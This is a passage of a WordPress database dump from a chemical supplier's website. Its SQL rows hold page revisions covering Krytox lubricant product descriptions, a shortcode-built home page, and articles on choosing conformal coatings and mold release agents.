joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include low-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High-Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best a temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nRecently we have added the new FPG series to the Krytox line offering. <a href="https://www.miller-stephenson.com/krytox-fpg-028-performance-lubricant/">FPG 028</a> was designed for use in aircraft and supporting equipment. Krytox™ FPG 028 is MIL-PRF-27617 TYPE IV specified and has AFPET/PTPT approval. It is resistant to hydrocarbon fuel, liquid oxygen and a variety of other chemicals. FPG 028 operates well under severe conditions and can be used for bearings and gears, and as a lubricant for O-rings and elastomers. The other FPG product, <a href="https://www.miller-stephenson.com/krytox-fpg-182-performance-lubricant/">the FPG 182</a> was designed for clean rooms, robotics, and electronic manufacturing. FPG 182 can be used for bearings, gears, and as a lubricant for O-rings and elastomers. It offers exceptional resistance to oxygen and chemicals and prevents corrosion.\r\n\r\nTo learn more about food grade applications <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">click here.</a>\r\n\r\nFor Automotive solutions <a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">click here.</a>\r\n\r\nKrytox <a href="https://www.miller-stephenson.com/krytox-faq/">FAQ.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/mil-prf-27617-greases/">MIL PRF 27617 Greases</a>\r\n\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nKrytox™ is  a trademark of <a href="https://www.chemours.com/">The Chemours Company</a> FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-11-19 16:27:34', '2016-11-19 16:27:34', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3073, 0, '2016-11-21 04:36:38', '2016-11-21 04:36:38', '', '', '', 'publish', 'closed', 'closed', '', '3073', '', '', '2016-11-21 04:36:38', '2016-11-21 04:36:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/3073/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3074, 179, '2016-11-21 10:45:31', '2016-11-21 10:45:31', '', '', '', 'publish', 'closed', 'closed', '', '3074', '', '', '2016-11-21 10:45:32', '2016-11-21 10:45:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/3074/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3075, 107, '2016-11-21 15:02:11', '2016-11-21 15:02:11', '', '', '', 'publish', 'closed', 'closed', '', '3075', '', '', '2016-11-21 15:02:11', '2016-11-21 15:02:11', '', 0, 'https://www.miller-stephenson.com/nf_sub/3075/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3076, 2, '2016-11-21 16:12:20', '2016-11-21 16:12:20', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Large Inventory</h3>\r\nWith four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-11-21 16:12:20', '2016-11-21 16:12:20', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3077, 181, '2016-11-21 16:39:05', '2016-11-21 16:39:05', '', '', '', 'publish', 'closed', 'closed', '', '3077', '', '', '2016-11-21 16:39:05', '2016-11-21 16:39:05', '', 0, 'https://www.miller-stephenson.com/nf_sub/3077/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3078, 182, '2016-11-21 16:58:07', '2016-11-21 16:58:07', '', '', '', 'publish', 'closed', 'closed', '', '3078', '', '', '2016-11-21 16:58:07', '2016-11-21 16:58:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/3078/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3079, 183, '2016-11-21 17:52:51', '2016-11-21 17:52:51', '', '', '', 'publish', 'closed', 'closed', '', '3079', '', '', '2016-11-21 17:52:52', '2016-11-21 17:52:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/3079/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3080, 184, '2016-11-22 06:02:10', '2016-11-22 06:02:10', '', '', '', 'publish', 'closed', 'closed', '', '3080', '', '', '2016-11-22 06:02:10', '2016-11-22 06:02:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/3080/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3081, 0, '2016-11-22 08:55:23', '2016-11-22 08:55:23', '', '', '', 'publish', 'closed', 'closed', '', '3081', '', '', '2016-11-22 08:55:23', '2016-11-22 08:55:23', '', 0, 'https://www.miller-stephenson.com/nf_sub/3081/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3082, 185, '2016-11-22 10:51:47', '2016-11-22 10:51:47', '', '', '', 'publish', 'closed', 'closed', '', '3082', '', '', '2016-11-22 10:51:47', '2016-11-22 10:51:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/3082/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3083, 186, '2016-11-22 12:25:55', '2016-11-22 12:25:55', '', '', '', 'publish', 'closed', 'closed', '', '3083', '', '', '2016-11-22 12:25:56', '2016-11-22 12:25:56', '', 0, 'https://www.miller-stephenson.com/nf_sub/3083/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3084, 187, '2016-11-22 14:06:21', '2016-11-22 14:06:21', '', '', '', 'publish', 'closed', 'closed', '', '3084', '', '', '2016-11-22 14:06:22', '2016-11-22 14:06:22', '', 0, 'https://www.miller-stephenson.com/nf_sub/3084/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3085, 2, '2016-11-22 14:43:06', '2016-11-22 14:43:06', '<h3>Miller-Stephenson Conformal Coatings</h3>\r\nConformal coatings are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are four general classes of conformal coating to choose from:\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> Varnish conformal coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\nOur entire line of conformal coatings can be found <a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-11-22 14:43:06', '2016-11-22 14:43:06', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3086, 2, '2016-11-22 14:54:01', '2016-11-22 14:54:01', '<h3>Mold Release Agents: Which is right for you?</h3>\r\nMold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong>[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/"><strong>Thermoset polysiloxanes</strong></a>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> <strong><a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a></strong> excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys product</a></strong> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys 